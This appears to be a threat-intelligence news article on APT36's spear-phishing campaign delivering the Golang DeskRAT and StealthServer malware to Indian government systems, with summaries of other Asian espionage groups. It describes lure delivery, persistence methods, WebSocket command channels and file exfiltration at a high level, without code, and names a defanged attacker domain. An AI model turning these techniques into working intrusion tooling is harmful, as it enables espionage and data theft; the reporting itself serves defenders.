A Pakistan-linked hacking group APT36 (Transparent Tribe) is spear-phishing Indian government agencies with a new Golang-based “DeskRAT” malware.
Introduction
APT36 – also known as Transparent Tribe – has launched a fresh cyber espionage offensive against Indian government organizations. This Pakistan-linked threat actor, active since at least 2013, is delivering a new Golang-based Remote Access Trojan (RAT) dubbed “DeskRAT” via spear-phishing emails. The campaign was first observed in August–September 2025 and builds on prior attacks from earlier in the year. Using crafty phishing lures and custom malware, APT36’s latest operation highlights the evolving tactics of state-sponsored hackers and carries lessons for security teams worldwide.
APT36 Unleashes Golang DeskRAT on Indian Government
The attack starts with phishing mails containing either the malicious zip file or the link of the zip file hosted on a genuine cloud service such as Google Drive. The malicious zip file contains a “.desktop” file that contains malicious commands. As soon as the malicious .desktop file executes, it opens a legitimate document – a pdf document titled “CDS_Directive_Armed_Forces.pdf,” while it executes the DeskRAT malware from a similar website – “modgovindia[.]com” in the background. The attacker here uses a genuine document as bait for the malware.
DeskRAT has been designed to work on BOSS (Bharat Operating System Solutions) Linux. The malware starts a hidden C2 channel via WebSocket communications as soon as it gets executed on the system. The malware further uses various methods such as system services creation, addition of jobs in crons, integration of the malware into the auto-start directory, and shell profiles modification. Such an array of persistence mechanisms makes it difficult to remove the malware from the system as it always manages to restart itself when rebooted.
The capabilities of “DeskRAT” reflect an emphasis on intelligence gathering and lateral movement. As discussed by security researchers, “The RAT scans directories and retrieves files of interest (< 100MB with specific extensions), exporting them to its C2 server.” The malware offers functionality to “traverse files on the host system by performing various commands including data gathering and unleashing additional malware payloads such as Python files, shell files, or desktop files.” The malware’s “ping/heartbeat commands” ensure that the affected system’s vitality remains confirmed by the attackers.
These functions work behind the scenes without the knowledge of the victim as he/she unknowingly opens what appeared to be an ordinary .pdf file. It should be noted that earlier this year, the group shared links from trusted cloud drives to deliver malware. In the current attacks, however, they used hosting servers such as those used by the ‘modgovindia’ site. Note that the increased investment in infrastructure has made it difficult to counter these malicious attacks.
Cross-Platform Ambitions: Windows and Linux Under Fire
While the DeskRAT malware targets Linux systems, APT36’s ambitions are notably cross-platform. Security researchers at QiAnXin XLab uncovered that the same campaign was also extended to Windows devices via a Golang-based backdoor the researchers call “StealthServer”. The phishing approach was similar – booby-trapped desktop shortcut files sent via email – but the payload for Windows is tailored to that environment.
Over the summer of 2025, at least three variants of the StealthServer malware were observed, evolving rapidly to evade detection. Early versions employed anti-analysis tricks and used traditional TCP channels for C2, even modifying Windows Scheduler, Startup folders, and the registry for persistence. Later versions added new anti-debugging checks and eventually adopted WebSocket communication — the same method used by DeskRAT — indicating a unification of tactics across operating systems.
Intriguingly, researchers also found two Linux variants related to StealthServer: one was essentially DeskRAT (with an extra command called “welcome”), and another that communicated over HTTP instead of WebSockets. The HTTP-based variant could recursively crawl the entire filesystem (starting at the root “/”) to find and exfiltrate files, uploading them in encrypted form to a remote server.
This broader Linux tool, likely an earlier iteration of DeskRAT, shows how APT36 has been refining their malware – from a crude all-encompassing data sweeper to a more controlled tool with specific exfiltration commands in DeskRAT. The group’s rapid development cycle and the multitude of malware versions underscore a high level of sophistication and “a high delivery cadence” in their operations. In short, APT36 is actively updating its malware arsenal to target both Linux and Windows environments, aiming to maximize reach within target organizations.
Broader Implications for Global Cybersecurity
APT36’s latest campaign is not an isolated incident – it comes amid a surge of cyber espionage activity across South and East Asia, much of which has global ramifications. Multiple advanced threat actors in the region have been active in recent weeks, targeting government and industry in various countries. For example, recent campaigns include:
- Bitter APT (APT-Q-37) – Suspected to operate with South Asian interests, Bitter APT has been phishing government, power, and military sectors in China and Pakistan. They use malicious Excel spreadsheets or compressed files exploiting a known vulnerability (CVE-2025-8088) to drop a custom C# malware implant. In some cases, they even distributed malicious ClickOnce applications via email to deploy backdoors that periodically beacon out device information. These tactics illustrate how adversaries leverage software flaws and social engineering to penetrate high-value targets.
- SideWinder – Another prolific group, SideWinder, launched a “Operation SouthNet” campaign targeting the maritime industry and other sectors in Pakistan, Sri Lanka, Bangladesh, Nepal, and Myanmar. Using credential-harvesting web portals and weaponized lure documents, SideWinder’s attacks deliver multi-platform malware to victims as part of a concentrated regional espionage effort. The wide geographic spread of victims in this operation shows a broadening scope of attacks that can impact international supply chains (like shipping) and national security across borders.
- OceanLotus (APT-Q-31) – A Vietnam-aligned hacking group, OceanLotus has been observed delivering the powerful Havoc post-exploitation framework in targeted attacks. Their campaign aimed at government departments and enterprises in China and neighboring Southeast Asian countries, demonstrating that countries beyond South Asia are also grappling with sophisticated espionage threats. Tools like Havoc enable attackers to maintain long-term stealthy access in victim networks, emphasizing that the challenge of APT intrusions is truly pan-Asian (and by extension, global) in nature.
- Mysterious Elephant (APT-K-47) – Active in early 2025, this group executed a multi-pronged attack campaign against government and foreign affairs organizations in Pakistan, Afghanistan, Bangladesh, Nepal, India, and Sri Lanka. Their methodology combined exploit kits, phishing emails, and malicious documents to establish footholds. Notably, they deployed custom malware like BabShell (a C++ reverse shell) and in-memory loaders (e.g., Remcos RAT via “MemLoader”) to carry out espionage. Mysterious Elephant’s use of both bespoke and open-source tools reflects a trend of APT groups developing their own arsenals to avoid relying solely on publicly known malware. Kaspersky analysts describe this group as “highly sophisticated and active”, underlining the significant threat they pose in the Asia-Pacific region.
Common among these intrusions – including APT36’s DeskRAT campaign – is an objective to steal sensitive information. Attackers not only hunt for official documents, but also attempt to siphon off communications and credentials. For instance, some of the above operations specifically aimed to exfiltrate WhatsApp chat data and attachments from compromised PCs. Specialized modules (aptly named “Exfiltrators”) were used to capture files exchanged via the popular messaging platform, as well as to pilfer browsing data like cookies and authentication tokens from web browsers. These real-world examples show the breadth of data modern threat actors seek – from confidential government memos to personal messaging logs – all of which can be leveraged for intelligence or further attacks.
